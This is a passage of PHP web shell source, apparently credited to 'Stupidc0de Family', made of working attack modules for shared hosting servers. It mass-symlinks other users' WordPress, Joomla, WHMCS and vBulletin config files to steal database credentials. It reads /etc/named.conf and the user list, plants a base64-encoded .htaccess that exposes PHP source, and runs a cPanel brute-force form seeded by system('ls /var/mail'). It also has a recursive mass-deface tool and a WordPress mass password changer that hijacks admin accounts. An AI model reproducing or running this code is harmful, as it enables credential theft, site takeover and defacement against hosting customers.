  707. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  708. symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  709. symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  710. symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  711. symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  712. symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  713. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  714. symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  715. symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  716. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  717. symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  718. symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  719. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  720. symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  721. symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  722. symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  723. symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  724. symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  725. symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  726. symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  727. symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  728. symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  729. symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  730. symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  731. symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  732. symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  733. symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  734. symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  735. symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  736. symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  737. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  738. symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  739. symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  740. symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  741. symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  742. symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  743. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  744. symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  745. symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  746. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  747. symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  748. symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  749. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  750. symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  751. symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  752. symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  753. symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  754. symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  755. symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  756. symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  757. symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  758. symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  759. symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  760. symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  761. symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  762. symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  763. symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  764. symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  765. symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  766. symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  767. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  768. symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  769. symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  770. symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  771. symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  772. symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  773. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  774. symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  775. symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  776. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  777. symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  778. symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  779. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  780. symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  781. symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  782. symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  783. symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  784. symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  785. symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  786. symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  787. symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  788. symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  789. symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  790. symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  791. symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  792. symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  793. symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  794. symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  795. symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  796. symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  797. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  798. symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  799. symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  800. symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  801. symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  802. symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  803. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  804. symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  805. symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  806. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  807. symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  808. symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  809. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  810. symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  811. symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  812. symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  813. symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  814. symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  815. symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  816. symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  817. symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  818. symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  819. symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  820. symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  821. symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  822. symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  823. symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  824. symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  825. symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  826. symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  827. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  828. symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  829. symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  830. symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  831. symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  832. symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  833. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  834. symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  835. symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  836. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  837. symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  838. symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  839. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  840. symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  841. symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  842. symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  843. symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  844. symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  845. symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  846. symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  847. symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  848. symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  849. symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  850. symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  851. symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  852. symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  853. symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  854. symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  855. symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  856. symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  857. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  858. symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  859. symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  860. symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  861. symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  862. symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  863. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  864. symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
  865. symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
  866. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
  867. symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
  868. symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
  869. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
  870. symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
  871. symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
  872. symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
  873. symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
  874. symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
  875. symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
  876. symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
  877. symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
  878. symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
  879. symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
  880. symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
  881. symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
  882. symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
  883. symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
  884. symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
  885. symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
  886. symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
  887. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
  888. symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
  889. symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
  890. symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
  891. symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
  892. symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
  893. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
  894. }
  895.  
  896. $d0mains = @file("/etc/named.conf");
  897.  
  898. if($d0mains)
  899. {
  900. mkdir($fn);
  901. chdir($fn);
  902.  
  903. foreach($d0mains as $d0main)
  904. {
  905. if(eregi("zone",$d0main))
  906. {
  907. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  908. flush();
  909.  
  910. if(strlen(trim($domains[1][0])) > 2)
  911. {
  912. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  913.  
  914. syml($user['name'],$domains[1][0]);
  915. }
  916. }
  917. }
  918. echo "<center><font color=springgreen size=3>Done</font></center>";
  919. echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
  920. }
  921. else
  922. {
  923. mkdir($fn);
  924. chdir($fn);
  925. $temp = "";
  926. $val1 = 0;
  927. $val2 = 1000;
  928. for(;$val1 <= $val2;$val1++)
  929. {
  930. $uid = @posix_getpwuid($val1);
  931. if ($uid)
  932. $temp .= join(':',$uid)."\n";
  933. }
  934. echo '<br/>';
  935. $temp = trim($temp);
  936.  
  937. $file5 = fopen("test.txt","w");
  938. fputs($file5,$temp);
  939. fclose($file5);
  940.  
  941. $htaccess =
  942. 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
  943. aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
  944. biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
  945. ';
  946. $file = fopen(".htaccess","w+");
  947. $write = fwrite ($file ,base64_decode($htaccess));
  948.  
  949. $file = fopen("test.txt", "r") or exit("Unable to open file!");
  950. while(!feof($file))
  951. {
  952. $s = fgets($file);
  953. $matches = array();
  954. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  955. $matches = str_replace("home/","",$matches[1]);
  956. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  957. continue;
  958. syml($matches,$matches);
  959. }
  960. fclose($file);
  961. echo "</table>";
  962. unlink("test.txt");
  963. echo "<center><font color=springgreen size=3>Done</font></center>";
  964. echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
  965. }
  966. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  967. exit;
  968. }
  969. ?>
  970. <form method="POST" target="_blank">
  971. <input name="page" type="hidden" value="find">
  972. <table border=1>
  973. <body bgcolor="black" text="white"><br><br>
  974.  
  975. <center><b><font size="2" style="italic" color="white">Cpanel BruteForce<br><br></b></center></td></tr>
  976. <tr>
  977. <td>
  978. <strong>User :</strong>
  979. </td>
  980. <td>
  981. <strong><textarea cols="50" style="background:#191818;outline:none;color:white;" rows="5" name="usernames"><?php system('ls /var/mail');?></textarea></strong>
  982. </td>
  983. <tr>
  984. <td>
  985. <strong>Pass :</strong>
  986. </td>
  987. <td>
  988. <strong><textarea cols="50" style="background:#191818;outline:none;color:white;" rows="5" name="passwords"></textarea></strong>
  989. </td>
  990. </tr>
  991. <tr>
  992. <td>
  993. <strong>Type :</strong>
  994. </td>
  995. <td>
  996. <span style="background:#191818;outline:none;color:white;"><strong>Simple : </strong> </span>
  997. <strong>
  998. <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
  999. <font style="background:black;outline:none;color:white;"><strong>/etc/passwd : </strong> </font>
  1000. <strong>
  1001. <input type="radio" name="type" value="passwd" style="background:black;outline:none;color:white;"></strong><span class="style3"><strong>
  1002. </strong>
  1003. </span>
  1004. <td style="background:black;outline:none;color:white;" >
  1005. <strong><input class ='bordergaya' type="submit" value="START"></strong>
  1006. </td>
  1007. </tr>
  1008. </table>
  1009. <br>
  1010. <table border=1>
  1011. </form>
  1012. <tr>
  1013. <td style="background:black;outline:none;color:white;">
  1014. <strong>Get Wordlist</strong>
  1015. <form method="POST" target="_blank">
  1016. <strong>
  1017. <input name="pass" type="hidden" value="password">
  1018. </strong>
  1019. <strong>Url Config :</strong>
  1020. <td>
  1021.  
  1022. <strong>
  1023. <input style="background:black;outline:none;color:white;" size="80" name="url" type="text"></strong>
  1024.  
  1025. <td style="background:black;outline:none;color:white;"><strong><input class ='bordergaya' type="submit" value="GO">
  1026. </strong>
  1027. </td>
  1028. </table>
  1029. <?php
  1030. echo"<br/><br/>";
  1031. break;
  1032. }
  1033. elseif(isset($_GET['x']) && ($_GET['x'] == 'massde'))
  1034. {
  1035. ?></center></center>
  1036. <style type="text/css">
  1037. .ketengah{
  1038. text-align: left;
  1039. font-size: 16px;
  1040. color: orange;
  1041. font-family: Homenaje;
  1042. margin-left: 30%;
  1043. </style>
  1044. <?php
  1045. /*thanks To IndoXploit*/
  1046. function sabun_massal($path,$namafile,$isi_script) {
  1047. if(is_writable($path)) {
  1048. $patha = scandir($path);
  1049. foreach($patha as $pathb) {
  1050. $pathc = "$path/$pathb";
  1051. $lokasi = $pathc.'/'.$namafile;
  1052. if($pathb === '.') {
  1053. file_put_contents($lokasi, $isi_script);
  1054. } elseif($pathb === '..') {
  1055. file_put_contents($lokasi, $isi_script);
  1056. } else {
  1057. if(is_dir($pathc)) {
  1058. if(is_writable($pathc)) {
  1059. echo "<font class='ketengah'><font color=crimson>-:-</font><font color=white>Sukses Bos Q</font><font color=crimson>-:-</font> <font color=springgreen>Cek di :</font> $lokasi</font><br>";
  1060. file_put_contents($lokasi, $isi_script);
  1061. $idx = sabun_massal($pathc,$namafile,$isi_script);
  1062. }
  1063. }
  1064. }
  1065. }
  1066. }
  1067. }
  1068. if($_POST['start']) {
  1069. echo "<div style='margin: 5px auto; padding: 5px'>";
  1070. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1071. echo "</div>";
  1072. } else {
  1073. echo "<center>";
  1074. echo "<form method='post'><br><br>
  1075. <table>
  1076. <tr>
  1077. <td><font style='text-decoration: underline; margin-left:10px;'>Folder</font></td>
  1078. <td align='center'>:</td>
  1079. <td><input class='justborder' type='text' name='d_dir' value='$path' style='width: 95%;' height='10'><br></td>
  1080. </tr>
  1081. <tr>
  1082. <td><font style='text-decoration: underline; margin-left:10px;'>Filename</font></td>
  1083. <td align='center'>:</td>
  1084. <td><input class='justborder' type='text' name='d_file' value='hacked.html' style='width: 95%;' height='10'><br></td>
  1085. </tr>
  1086. <tr>
  1087. <td colspan='3' align='center'><font style='text-decoration: underline;'>Script Deface : </font><br></td>
  1088. </tr>
  1089. <tr>
  1090. <td colspan='3'><textarea class='justborder' name='script' style='width: 500px; height: 200px;'>Hacked by Stupidc0de Family!</textarea><br></td>
  1091. </tr>
  1092. <tr>
  1093. <td colspan='3' align='center'><input class='justborder' type='submit' name='start' value='Mass Deface' style='width: 50%;'><br/></td>
  1094. </tr>
  1095. </table><br><br><br>
  1096. </form></center><br/>";
  1097. }break;?><center><center><?php
  1098. }
  1099. elseif(isset($_GET['x']) && ($_GET['x'] == 'mpc'))
  1100. {
  1101. ?>
  1102. <form action="?path=<?php echo $path; ?>&amp;x=mpc" method="post">
  1103. <?php
  1104. set_time_limit(0);
  1105. ini_set('display_errors', 0);
  1106.  
  1107. echo '<center><h2>WordPress Mass Password Changer</h2><br /><br/></center>';
  1108. echo '<form method="POST" action="" >
  1109. <center><table border="1" class="justborder"><tr><td>Config List:</td>
  1110. <td><textarea class="justborder" name="url" cols="50" rows="10" ></textarea></td></tr>
  1111. <tr><td>User/Password</td><td><input class="justborder" type="text" name="username" size="25" value="Psrmrh"> /
  1112. <input class="justborder" type="text" name="password" size="25" value="stupidc0de"></td></tr></table>
  1113. <br><input class="bordergaya" type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>';
  1114.  
  1115. if ($_POST['action']=='1'){
  1116. if ($_POST['url']==''){
  1117. echo "<div class='result'>No CONFIG FOUND<br>Make sure you provided a config list!</div><br>";
  1118. }else{
  1119. $url=$_POST['url'];
  1120. $users = explode("\n",$url);
  1121. foreach ($users as $user) {
  1122. $user1=trim($user);
  1123. $code=file_get_contents2($user1);
  1124. preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
  1125. $db=$b1[1][0];
  1126. preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
  1127. $user=$b2[1][0];
  1128. preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
  1129. $db_password=$b3[1][0];
  1130. preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
  1131. $host=$b4[1][0];
  1132. preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
  1133. $p=$b5[1][0];
  1134.  
  1135. $d=@mysql_connect( $host, $user, $db_password ) ;
  1136. if ($d){
  1137. @mysql_select_db($db );
  1138. $usern=$_POST['username'];
  1139. $passwd=$_POST['password'];
  1140. $sql = "UPDATE `".$p."users` SET `user_pass` = MD5( '".$passwd."' ) WHERE `ID` = '1';";
  1141. @mysql_query($sql) ; ;
  1142. $sql = "UPDATE `".$p."users` SET `user_login` = '".$usern."' WHERE `ID` = '1';";
  1143. @mysql_query($sql) ; ;
  1144. $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
  1145. $siteurl=@mysql_fetch_array($aa) ;
  1146. $siteurl=$siteurl['option_value'];
  1147. $tr.="$siteurl\n";
  1148. mysql_close();
  1149. }
  1150. }
  1151. if ($tr)
  1152. $filename = 'changed.txt';
  1153. $fp = fopen($filename, "a+");
  1154. $write = fputs($fp, $tr);
  1155. fclose($fp);
  1156. echo "<div class='result'>Password Changing Completed ! :)<br><br>";
  1157. echo "<a href='changed.txt' target='_blank'>View List of Password Changed Sites</a></div><br/>";
  1158.  
  1159. }
  1160. }
  1161. function file_get_contents2($u){
  1162. $ch = curl_init();
  1163. curl_setopt($ch,CURLOPT_URL,$u);
  1164. curl_setopt($ch, CURLOPT_HEADER, 0);
  1165. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  1166. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
  1167. $result = curl_exec($ch);
  1168. return $result ;
  1169. }
  1170. echo "<br /><br />";
  1171. break;
  1172. ?>
  1173. <?php }
  1174. elseif(isset($_GET['x']) && ($_GET['x'] == 'masstool'))
  1175. {
  1176. echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>";
  1177. ?>
  1178. <a href="?<?php echo "path=".$path; ?>&amp;x=massde"><input class=bordergaya type=submit value="Mass Deface" /></a>
  1179. Or <a href="?<?php echo "path=".$path; ?>&amp;x=mpc"><input class=bordergaya type=submit value="Wordpress Mass Password Changer" /></a>
  1180. Or <a href="?<?php echo "path=".$path; ?>&amp;x=zonesH"><input class=bordergaya type=submit value="Zone-H Mass Notifier" /></a>
  1181.  
  1182. <?php
  1183. break;
  1184. }
  1185. elseif(isset($_GET['x']) && ($_GET['x'] == 'tentang'))
  1186. {
